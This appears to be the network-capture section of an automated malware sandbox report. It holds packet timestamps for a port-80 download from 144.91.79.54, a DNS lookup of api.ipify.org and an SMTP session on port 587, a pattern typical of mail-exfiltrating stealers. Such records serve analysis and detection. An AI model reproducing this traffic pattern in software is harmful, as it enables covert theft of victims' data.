                                                    Jan 15, 2025 21:27:26.204322100 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.204335928 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204369068 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204372883 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.204401970 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204433918 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204442978 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.204483986 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204516888 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204528093 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.204566002 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204597950 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204618931 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.204629898 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204662085 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204680920 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.204710960 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204744101 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204756021 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.204778910 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204809904 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204829931 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.204843998 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204874992 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204886913 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.204907894 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204941034 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.204966068 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.204973936 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205004930 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205015898 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.205038071 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205070019 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205089092 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.205104113 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205136061 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205149889 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.205168962 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205200911 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205229044 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.205234051 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205265999 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205277920 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.205300093 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205331087 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205343962 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.205363989 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205398083 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205424070 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.205430984 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205462933 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205473900 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.205497026 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205524921 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.205543041 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.256144047 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.283078909 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283153057 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283188105 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283222914 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283236980 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.283286095 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.283294916 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283374071 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283426046 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.283433914 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283484936 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283534050 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.283534050 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283567905 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283600092 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283617973 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.283648014 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283679962 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283701897 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.283714056 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283761024 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.283776999 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283808947 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283842087 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283847094 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.283893108 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283929110 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283956051 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.283962011 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.283993959 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284013987 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284027100 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284060001 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284071922 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284092903 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284126997 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284158945 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284162998 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284197092 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284209013 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284243107 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284276009 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284285069 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284307957 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284347057 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284349918 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284404039 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284435034 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284446955 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284468889 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284512997 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284517050 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284548998 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284581900 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284589052 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284615993 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284647942 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284672976 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284698009 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284730911 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284744024 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284764051 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284796953 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284806967 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284836054 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284867048 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284881115 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284900904 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284933090 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.284945011 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.284981012 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285013914 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285026073 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285047054 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285080910 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285090923 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285115004 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285146952 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285172939 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285191059 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285223961 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285233021 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285273075 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285305977 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285319090 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285337925 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285366058 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285382032 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285397053 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285430908 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285440922 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285464048 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285496950 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285507917 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285530090 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285564899 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285571098 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285595894 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285629034 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285640001 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285661936 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285695076 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285706043 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285727978 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285761118 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285769939 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285793066 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285825014 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285839081 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285856962 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285890102 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285898924 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285923004 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285955906 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.285964966 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.285988092 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286020994 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286031961 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286055088 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286097050 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286104918 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286148071 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286192894 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286192894 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286210060 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286233902 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286245108 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286247015 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286262035 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286274910 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286283016 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286286116 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286303043 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286313057 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286323071 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286324978 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286334991 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286346912 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286355972 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286360025 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286365986 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286377907 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286385059 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286393881 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286405087 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286413908 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286413908 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286423922 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286433935 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286442995 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286444902 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286478996 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286494970 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286505938 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286516905 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286529064 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286539078 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286556005 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286623001 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286633968 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286643028 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286650896 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286659956 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286663055 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286706924 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.286736965 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286746025 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.286775112 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.322148085 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.327732086 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.327801943 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.327836990 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.327851057 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.327869892 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.327905893 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.327931881 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.329281092 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.329314947 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.329335928 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.329348087 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.329390049 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.370318890 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.370366096 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.370403051 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.370429993 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.370436907 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.370470047 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.370484114 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.370503902 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.370537043 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.370549917 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.370572090 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.370686054 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.918318033 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:30.928028107 CET49674443192.168.2.523.1.237.91
                                                    Jan 15, 2025 21:27:30.928040981 CET49675443192.168.2.523.1.237.91
                                                    Jan 15, 2025 21:27:31.053039074 CET49673443192.168.2.523.1.237.91
                                                    Jan 15, 2025 21:27:32.716711044 CET4434970523.1.237.91192.168.2.5
                                                    Jan 15, 2025 21:27:32.716963053 CET49705443192.168.2.523.1.237.91
                                                    Jan 15, 2025 21:27:33.086209059 CET49707443192.168.2.5172.67.74.152
                                                    Jan 15, 2025 21:27:33.086253881 CET44349707172.67.74.152192.168.2.5
                                                    Jan 15, 2025 21:27:33.086322069 CET49707443192.168.2.5172.67.74.152
                                                    Jan 15, 2025 21:27:33.102427006 CET49707443192.168.2.5172.67.74.152
                                                    Jan 15, 2025 21:27:33.102471113 CET44349707172.67.74.152192.168.2.5
                                                    Jan 15, 2025 21:27:33.574888945 CET44349707172.67.74.152192.168.2.5
                                                    Jan 15, 2025 21:27:33.574970961 CET49707443192.168.2.5172.67.74.152
                                                    Jan 15, 2025 21:27:33.609138012 CET49707443192.168.2.5172.67.74.152
                                                    Jan 15, 2025 21:27:33.609154940 CET44349707172.67.74.152192.168.2.5
                                                    Jan 15, 2025 21:27:33.609524965 CET44349707172.67.74.152192.168.2.5
                                                    Jan 15, 2025 21:27:33.662399054 CET49707443192.168.2.5172.67.74.152
                                                    Jan 15, 2025 21:27:33.827617884 CET49707443192.168.2.5172.67.74.152
                                                    Jan 15, 2025 21:27:33.875333071 CET44349707172.67.74.152192.168.2.5
                                                    Jan 15, 2025 21:27:33.936165094 CET44349707172.67.74.152192.168.2.5
                                                    Jan 15, 2025 21:27:33.936250925 CET44349707172.67.74.152192.168.2.5
                                                    Jan 15, 2025 21:27:33.936306953 CET49707443192.168.2.5172.67.74.152
                                                    Jan 15, 2025 21:27:34.009609938 CET49707443192.168.2.5172.67.74.152
                                                    Jan 15, 2025 21:27:34.768743992 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:34.773524046 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:34.773597002 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:35.553765059 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:35.561285019 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:35.566066980 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:35.733308077 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:35.734217882 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:35.739000082 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:35.904500008 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:35.905477047 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:35.910268068 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.083173990 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.083385944 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:36.088159084 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.282025099 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.282362938 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:36.287178040 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.468002081 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.468200922 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:36.472997904 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.637281895 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.637821913 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:36.637871981 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:36.637921095 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:36.637921095 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:27:36.642607927 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.642633915 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.642755985 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.642769098 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.923307896 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:27:36.974894047 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:29:14.787906885 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:29:14.793283939 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:29:15.100421906 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:29:15.100472927 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:29:15.100517988 CET58749709162.254.34.31192.168.2.5
                                                    Jan 15, 2025 21:29:15.100589037 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:29:15.100589037 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:29:15.100589037 CET49709587192.168.2.5162.254.34.31
                                                    Jan 15, 2025 21:29:15.106040955 CET58749709162.254.34.31192.168.2.5

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 15, 2025 21:27:33.073895931 CET6440053192.168.2.51.1.1.1
                                                    Jan 15, 2025 21:27:33.080662012 CET53644001.1.1.1192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 15, 2025 21:27:33.073895931 CET192.168.2.51.1.1.10x198eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 15, 2025 21:27:33.080662012 CET1.1.1.1192.168.2.50x198eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 21:27:33.080662012 CET1.1.1.1192.168.2.50x198eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 21:27:33.080662012 CET1.1.1.1192.168.2.50x198eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 21:27:35.272358894 CET1.1.1.1192.168.2.50xe9cbNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 21:27:35.272358894 CET1.1.1.1192.168.2.50xe9cbNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 21:27:36.289161921 CET1.1.1.1192.168.2.50x1603No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                    Jan 15, 2025 21:27:36.289161921 CET1.1.1.1192.168.2.50x1603No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                    Jan 15, 2025 21:27:36.289161921 CET1.1.1.1192.168.2.50x1603No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 21:28:37.900217056 CET1.1.1.1192.168.2.50xe37aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 21:28:37.900217056 CET1.1.1.1192.168.2.50xe37aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

